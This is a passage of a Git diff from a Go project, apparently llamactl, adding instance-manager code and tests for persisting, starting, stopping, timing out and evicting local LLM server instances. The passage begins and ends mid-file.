if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(runningNames[i], inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
}
// loadInstances restores all instances from disk
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
im.ports[port] = true
}
im.instances[name] = inst
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
}
}
im.mu.RUnlock()
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}

211
pkg/manager/manager_test.go Normal file
View File

@@ -0,0 +1,211 @@
package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
)
func TestNewInstanceManager(t *testing.T) {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
mgr := manager.NewInstanceManager(backendConfig, cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(backendConfig, cfg)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(backendConfig, cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
func TestConcurrentAccess(t *testing.T) {
mgr := createTestManager()
defer mgr.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := range 5 {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
mgr.Shutdown()
// Multiple shutdowns should not panic
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(backendConfig, cfg)
}

316
pkg/manager/operations.go Normal file
View File

@@ -0,0 +1,316 @@
package manager
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
instance, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
}
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
return options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
return options.VllmServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
options.MlxServerOptions.Port = port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
options.VllmServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}

View File

@@ -0,0 +1,237 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(backendConfig, cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

64
pkg/manager/timeout.go Normal file
View File

@@ -0,0 +1,64 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}

332
pkg/manager/timeout_test.go Normal file
View File

@@ -0,0 +1,332 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
MLX: config.BackendSettings{Command: "mlx_lm.server"},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(backendConfig, cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
